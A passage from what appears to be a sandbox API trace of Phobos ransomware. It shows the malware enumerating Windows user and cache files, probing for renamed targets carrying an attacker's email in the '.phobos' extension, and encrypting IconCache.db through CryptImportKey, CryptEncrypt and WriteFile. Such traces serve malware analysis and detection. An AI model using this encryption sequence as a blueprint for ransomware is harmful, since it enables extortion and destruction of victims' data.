"c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp")) returned 0x20 [0200.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.243] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.243] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.243] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.243] CloseHandle (hObject=0x160) returned 1 [0200.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp")) returned 0x20 [0200.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.244] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.244] CloseHandle (hObject=0x160) returned 1 [0200.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp")) returned 0x20 [0200.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile40.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.244] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.245] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.245] CloseHandle (hObject=0x160) returned 1 [0200.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp")) returned 0x20 [0200.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile41.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile41.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.245] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.245] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.245] CloseHandle (hObject=0x160) returned 1 [0200.245] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp")) returned 0x20 [0200.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile42.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile42.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.246] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.246] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.246] CloseHandle (hObject=0x160) returned 1 [0200.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp")) returned 0x20 [0200.246] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile43.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile43.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.246] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.247] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=49208) returned 1 [0200.247] CloseHandle (hObject=0x160) returned 1 [0200.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp")) returned 0x20 [0200.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile44.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile44.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\cversions.2.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.247] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=16384) returned 1 [0200.247] CloseHandle (hObject=0x160) returned 1 [0200.247] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\cversions.2.db")) returned 0x2020 [0200.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\cversions.2.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\cversions.2.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.248] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.248] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1216) returned 1 [0200.248] CloseHandle (hObject=0x160) returned 1 [0200.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db")) returned 0x2020 [0200.248] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{3978EA0A-1C7E-4449-8AE1-E1265F039002}.2.ver0x0000000000000003.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{3978ea0a-1c7e-4449-8ae1-e1265f039002}.2.ver0x0000000000000003.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.248] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.248] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=2312) returned 1 [0200.248] CloseHandle (hObject=0x160) returned 1 [0200.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db")) returned 0x2020 [0200.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{40FC8D7D-05ED-4FEB-B03B-6C100659EF5C}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{40fc8d7d-05ed-4feb-b03b-6c100659ef5c}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.249] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.249] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1048) returned 1 [0200.249] CloseHandle (hObject=0x160) returned 1 [0200.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db")) returned 0x2020 [0200.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{4E36EA69-73D1-4458-9D16-50F8E31A69A0}.2.ver0x0000000000000001.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{4e36ea69-73d1-4458-9d16-50f8e31a69a0}.2.ver0x0000000000000001.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.249] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.250] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=194032) returned 1 [0200.250] CloseHandle (hObject=0x160) returned 1 [0200.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db")) returned 0x2020 [0200.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000012.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000012.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.250] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=415096) returned 1 [0200.250] CloseHandle (hObject=0x160) returned 1 [0200.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db")) returned 0x2020 [0200.250] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0x2020 [0200.250] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.251] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=89534) returned 1 [0200.251] CloseHandle (hObject=0x160) returned 1 [0200.251] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif")) returned 0x20 [0200.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\VirtualInbox\\en-US\\WelcomeFax.tif" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\virtualinbox\\en-us\\welcomefax.tif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.252] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0200.252] GetFileSizeEx (in: hFile=0x160, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=516424) returned 1 [0200.252] CloseHandle (hObject=0x160) returned 1 [0200.252] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg")) returned 0x20 [0200.253] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows NT\\MSScan\\WelcomeScan.jpg" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msscan\\welcomescan.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0200.253] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0200.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.358] GetFileSizeEx (in: hFile=0x13c, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=776176) returned 1 [0200.358] CloseHandle (hObject=0x13c) returned 1 [0200.358] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db")) returned 0x2022 [0200.359] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13c [0200.359] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.359] SetFilePointerEx (in: hFile=0x13c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0200.359] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\IconCache.db.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\appdata\\local\\iconcache.db.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x174 [0200.360] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa32928) returned 1 [0200.360] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.360] ReadFile (in: hFile=0x13c, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xbd7f0, lpOverlapped=0x0) returned 1 [0200.708] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd800, dwBufLen=0xbd800 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xbd800) returned 1 [0200.715] WriteFile (in: hFile=0x174, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xbd800, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xbd800, lpOverlapped=0x0) returned 1 [0200.728] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32868) returned 1 [0200.730] CryptSetKeyParam (hKey=0xa32868, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0200.730] CryptEncrypt (in: hKey=0xa32868, hHash=0x0, Final=0, dwFlags=0x0, 